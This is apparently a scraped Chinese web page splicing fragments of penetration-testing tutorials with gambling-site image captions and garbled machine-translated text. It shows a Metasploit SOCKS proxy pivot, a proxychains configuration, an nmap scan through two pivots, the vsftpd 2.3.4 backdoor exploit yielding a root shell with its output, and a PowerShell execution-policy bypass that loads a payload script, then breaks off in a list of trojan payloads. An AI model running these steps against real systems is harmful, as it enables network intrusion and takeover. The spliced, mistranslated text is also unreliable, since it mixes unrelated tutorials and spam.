msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a  msf auxiliary(socks4a) > show options  Module options (auxiliary/server/socks4a):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    SRVHOST  172.16.0.20      yes       The address to listen on    SRVPORT  1080             yes       The port to listen on. Auxiliary action:    Name   Description    ----   -----------    Proxy   msf auxiliary(socks4a) > set SRVPORT 1081SRVPORT => 1081msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > 

必赢官网 24

不留余地方案是vim文件,删除文件开端两行依旧不行的内容。
msfconsole
效果:用来在指令行下运维metasploit。

也即今后Attacker本地的1080端口的代理能够访谈到7.7.7.x网段,1081端口的代办能够访谈到8.8.8.x网段,然后将新开的端口 增多到proxychains的配置文件中:

必赢官网 25

必赢官网 26

root@kali:~# cat /etc/proxychains.conf | grep -v "#"dynamic_chainproxy_dns tcp_read_time_out 15000tcp_connect_time_out 8000socks4  172.16.0.20 1080  # First Pivotsocks4  172.16.0.20 1081  # Second Pivot 

必赢官网 27

初阶后可知到metasploit当前版本,以致各样模块的插件数量。
auxiliary扫描模块
exploits漏洞使用模块
payloads
encoders编码模块
nops空字符模块

地点的几个代理也正是扇门的钥匙,172.16.0.20:1080是7.7.7.x的钥匙,172.16.0.20:1081是7.7.7.x背后的8.8.8.x的钥匙 ,Attacker要想访谈到8.8.8.x足以透过先张开7.7.7.x的门,再展开8.8.8.x的门(因为8.8.8.x那几个门在7.7.7.x这些门之后State of Qatar

必赢官网 28

search找出模块
比如说寻觅ms15_034尾巴的采取插件
1

使用Attacker本地的nmap扫描下8.8.8.x网段:

生成基于各式语言的shellcode,如,c,c#,java,python,powershell,ruby,raw,其它,cs也提供了可径直协作veil一齐利用的选项,这里照旧以最实用的powershell为例,生成好以往,想方法把脚本载入到对象体系中,这里就径直在指标cmd中载入了,实际中你能够把这一个代码单独扣出来放到任何能推行ps的地点

search ms15_034

root@kali:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vvProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html).NSE: Loaded 36 scripts for scanning. Initiating Connect Scan Scanning 8.8.8.9 [4 ports] |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK Discovered open port 21/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK Discovered open port 23/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK Discovered open port 22/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Discovered open port 80/tcp on 8.8.8.9Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports)Initiating Service scan at 05:54 Scanning 4 services on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host)NSE: Script scanning 8.8.8.9. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 05:54 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed NSE at 05:54, 1.71s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 05:54 Completed NSE at 05:54, 0.00s elapsed Nmap scan report for 8.8.8.9 Host is up, received user-set (0.41s latency). Scanned  PORT   STATE SERVICE REASON  VERSION 21/tcp open  ftp     syn-ack vsftpd 2.3.4 22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp open  telnet  syn-ack Linux telnetd 80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds root@kali:~# 

# powershell –exec bypass –Command "& {Import-Module 'C:payload.ps1'}"

发觉8.8.8.9(SK卡塔尔(قطر‎那台机器大概有漏洞,用msf模块尝试getshell:

必赢官网 29

必赢官网 30

msf > msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST                   yes       The target address   RPORT  21               yes       The target portExploit target:   Id  Name   --  ----   0   Automaticmsf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9rhost => 8.8.8.9msf exploit(vsftpd_234_backdoor) > run[*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4)[*] 8.8.8.9:21 - USER: 331 Please specify the password.[+] 8.8.8.9:21 - Backdoor service has been spawned, handling...[+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 4 opened (Local Pipe -> Remote Pipe) pwd/iduid=0(root) gid=0(root)ifconfigeth0      Link encap:Ethernet  HWaddr 08:00:27:56:f1:7c            inet addr:8.8.8.9  Bcast:8.8.8.255  Mask:255.255.255.0          inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:10843 errors:0 dropped:0 overruns:0 frame:0          TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:1081842 (1.0 MB)  TX bytes:661455 (645.9 KB)          Base address:0xd010 Memory:f0000000-f0020000 lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:18161 errors:0 dropped:0 overruns:0 frame:0          TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:5307479 (5.0 MB)  TX bytes:5307479 (5.0 MB) 

必赢官网 31

【编辑推荐】

必赢官网 32

合作木马弹Shell
前方小编介绍了怎样行使msfvenom生成木Marvin件,这里作者介绍怎样采纳msf连接上被试行的木Marvin件,达到调控目标服务器。
常用payload
首先大家纪念一下生成木Marvin件的下令,在那之中有一个payload的选项,常用的多少个payload。linux相关payload:
1
2
3
4
5
6